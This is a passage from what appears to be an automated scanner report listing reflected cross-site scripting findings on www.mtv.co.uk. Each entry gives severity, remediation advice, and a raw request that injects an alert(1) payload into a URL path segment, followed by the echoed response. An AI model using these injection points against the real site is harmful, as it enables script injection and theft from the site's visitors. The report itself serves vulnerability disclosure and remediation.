Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:38 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13459
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:39 GMT
Date: Mon, 12 Sep 2011 12:50:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/contenta9a84"-alert(1)-"276e5b2f698/flashbox/42684-mtv-uk-homepage-615x340");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.
...[SNIP]...
2.92. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c3f"-alert(1)-"6b0f5865cdd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/flashbox75c3f"-alert(1)-"6b0f5865cdd/42684-mtv-uk-homepage-615x340?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:46 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13464
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:46 GMT
Date: Mon, 12 Sep 2011 12:50:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
orting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/content/flashbox75c3f"-alert(1)-"6b0f5865cdd/42684-mtv-uk-homepage-615x340");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttrib
...[SNIP]...
2.93. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb0b9"-alert(1)-"f96d614e794 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/flashbox/42684-mtv-uk-homepage-615x340bb0b9"-alert(1)-"f96d614e794?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:53 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13465
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:53 GMT
Date: Mon, 12 Sep 2011 12:50:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/content/flashbox/42684-mtv-uk-homepage-615x340bb0b9"-alert(1)-"f96d614e794");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.94. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /files/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e2a2"-alert(1)-"6efac768962 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files4e2a2"-alert(1)-"6efac768962/favicon.ico HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:48 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13401
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:48 GMT
Date: Mon, 12 Sep 2011 12:50:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/files4e2a2"-alert(1)-"6efac768962/favicon.ico");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
...[SNIP]...
2.95. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /files/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeecc"-alert(1)-"a82a271c334 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/favicon.icoaeecc"-alert(1)-"a82a271c334 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Mon, 12 Sep 2011 12:50:55 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13403
Vary: Accept-Encoding
Expires: Mon, 12 Sep 2011 12:50:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 12 Sep 2011 12:50:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
rting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/files/favicon.icoaeecc"-alert(1)-"a82a271c334");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.96. http://www.mtv.co.uk/misc/thickbox.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /misc/thickbox.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d548"-alert(1)-"85713fad3dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc/9d548"-alert(1)-"85713fad3dc?1234890360 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13383
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/misc/9d548"-alert(1)-"85713fad3dc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.97. http://www.mtv.co.uk/modules/node/node.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1113"-alert(1)-"742e68c81f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/node/b1113"-alert(1)-"742e68c81f7?1234890364 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:52 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13395
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:52 GMT
Date: Mon, 12 Sep 2011 12:49:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/node/b1113"-alert(1)-"742e68c81f7");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.98. http://www.mtv.co.uk/modules/system/defaults.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bfa3"-alert(1)-"b3ed22fa9a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/system/4bfa3"-alert(1)-"b3ed22fa9a2?1234890363 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:51 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13399
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:51 GMT
Date: Mon, 12 Sep 2011 12:49:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
porting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/system/4bfa3"-alert(1)-"b3ed22fa9a2");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.99. http://www.mtv.co.uk/modules/system/system.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18ade"-alert(1)-"c57ecfadbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/system/18ade"-alert(1)-"c57ecfadbe?1234890363 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13401
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:50 GMT
Date: Mon, 12 Sep 2011 12:49:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
porting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/system/18ade"-alert(1)-"c57ecfadbe");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.100. http://www.mtv.co.uk/modules/user/user.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dce4"-alert(1)-"99564bbadd4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/user/9dce4"-alert(1)-"99564bbadd4?1234890366 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13398
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:50 GMT
Date: Mon, 12 Sep 2011 12:49:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/user/9dce4"-alert(1)-"99564bbadd4");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.101. http://www.mtv.co.uk/sites/all/modules/cck/content.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/cck/content.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c31"-alert(1)-"2f891d8457f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/cck/49c31"-alert(1)-"2f891d8457f?1234890340 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:53 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13413
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:53 GMT
Date: Mon, 12 Sep 2011 12:49:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/cck/49c31"-alert(1)-"2f891d8457f");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.102. http://www.mtv.co.uk/sites/all/modules/fckeditor/fckeditor.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/fckeditor/fckeditor.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 326da"-alert(1)-"6d091b0c1cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/fckeditor/326da"-alert(1)-"6d091b0c1cc?1234890357 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:54 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13423
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:55 GMT
Date: Mon, 12 Sep 2011 12:49:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/fckeditor/326da"-alert(1)-"6d091b0c1cc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
